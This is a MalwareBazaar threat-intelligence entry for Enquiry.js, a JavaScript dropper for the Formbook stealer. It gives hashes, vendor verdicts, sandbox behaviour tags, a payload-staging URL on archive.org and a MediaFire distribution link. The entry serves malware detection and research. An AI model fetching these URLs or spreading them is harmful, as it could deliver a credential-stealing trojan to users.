MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 656fd275d35b686220d5e221c29b239b6f1462c526b97ae9c3f778ccd14fb2c6. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Formbook


Vendor detections: 12


Intelligence 12 IOCs YARA File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 656fd275d35b686220d5e221c29b239b6f1462c526b97ae9c3f778ccd14fb2c6
SHA3-384 hash: f802c69457beadb3f40a5bd8e035da393cb2d0b088575dd7162e205ddddd0523aa424f19c9bd29d0826d700c51c4755d
SHA1 hash: bb50e0aecc248a1c56e265c33b487b2701cfca57
MD5 hash: 979d8d0d2e5f1cd54641a49a9de98b77
humanhash: dakota-sweet-spaghetti-jig
File name:Enquiry.js
Download: download sample
Signature Formbook
Create hunting rule
File size:58'434 bytes
First seen:2025-09-24 09:10:18 UTC
Last seen:Never
File type:Java Script (JS) js
MIME type:text/plain
ssdeep 1536:z1Jj0p9uZgnSxIEUMgnjJCb2zlconrnUcrF9z+o92EsqJrAoL+oj7rL97giudybi:p8S42
TLSH T1A74329EAED43952B5D139665CD756AC3CAA3411EF00ADE3C9A0D47C8FBD28A8C7097C4
Magika javascript
Reporter ShadowOpCode
Tags:FormBook js stego xloader

Intelligence

File Origin
# of uploads :
1
# of downloads :
327
Origin country :
IT IT
Vendor Threat Intelligence
Verdict:
Malicious
Score:
99.1%
Link:
https://cyber-fortress.com/docs/result/index.php?id=68d53e81cc9425144151cd03
Tags:
obfuscate xtreme virus
Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
anti-vm base64 evasive fingerprint obfuscated obfuscated powershell
Link:
https://www.filescan.io/uploads/68d3b5a6c24f53840f3047a5/reports/c6641329-c799-4c5e-a73a-494036d2739a/overview
Verdict:
Malicious
Labled as:
ObfuscatedDownloader.A.Generic
Link:
https://www.hybrid-analysis.com/sample/656fd275d35b686220d5e221c29b239b6f1462c526b97ae9c3f778ccd14fb2c6
Verdict:
Malicious
File Type:
js
First seen:
2025-09-23T05:50:00Z UTC
Last seen:
2025-09-23T05:50:00Z UTC
Hits:
~100
Detections:
Trojan.JS.SAgent.sb HEUR:Trojan-Downloader.Script.Generic HEUR:Trojan.Script.Generic
Link:
https://opentip.kaspersky.com/656fd275d35b686220d5e221c29b239b6f1462c526b97ae9c3f778ccd14fb2c6/results?tab=lookup
Score:
50%
Verdict:
Susipicious
File Type:
SCRIPT
Link:
https://malprob.io/report/656fd275d35b686220d5e221c29b239b6f1462c526b97ae9c3f778ccd14fb2c6
Verdict:
inconclusive
YARA:
1 match(es)
Link:
https://app.malva.re/file/979d8d0d2e5f1cd54641a49a9de98b77
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/656fd275d35b686220d5e221c29b239b6f1462c526b97ae9c3f778ccd14fb2c6/
Verdict:
Malicious
Threat:
Family.FORMBOOK
Link:
https://tip.neiki.dev/file/656fd275d35b686220d5e221c29b239b6f1462c526b97ae9c3f778ccd14fb2c6
Threat name:
Win32.Trojan.Generic
Create hunting rule
Status:
Suspicious
First seen:
2025-09-23 11:12:39 UTC
File Type:
Text (JavaScript)
AV detection:
6 of 36 (16.67%)
Threat level:
  5/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=mvx5e5otlnugeigv4iq4fgzdtnxriywfe24xv2od654mzukpwlda._file
Result
Malware family:
formbook
Create hunting rule
Score:
  10/10
Tags:
family:formbook execution rat spyware stealer trojan
Link:
https://tria.ge/reports/250924-k5h6satks4/
Behaviour
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Command and Scripting Interpreter: JavaScript
Suspicious use of SetThreadContext
Badlisted process makes network request
Command and Scripting Interpreter: PowerShell
Formbook payload
Formbook
Formbook family
Process spawned unexpected child process
Malware Config
Dropper Extraction:
http://archive.org/download/optimized_MSI_PRO_with_b64/optimized_MSI_PRO_with_b64.png
Malware family:
FormBook
Create hunting rule
Verdict:
Malicious
Link:
https://www.vmray.com/analyses/_mb/656fd275d35b/report/overview.html
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/656fd275d35b686220d5e221c29b239b6f1462c526b97ae9c3f778ccd14fb2c6

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Formbook

Java Script (JS) js 656fd275d35b686220d5e221c29b239b6f1462c526b97ae9c3f778ccd14fb2c6

(this sample)

Formbook

Executable exe 2032192834795c035bf9cffc7c0244d4227a5c30b3cb38799afa5416183ecca9

  
Link
https://www.mediafire.com/file/ba24868pmwx0b5o/Enquiry.js/file
  
Dropping
SHA256 2032192834795c035bf9cffc7c0244d4227a5c30b3cb38799afa5416183ecca9
  
Dropping
MD5 ba3e05beaf6e0f5ec7227d73ba03730c

Comments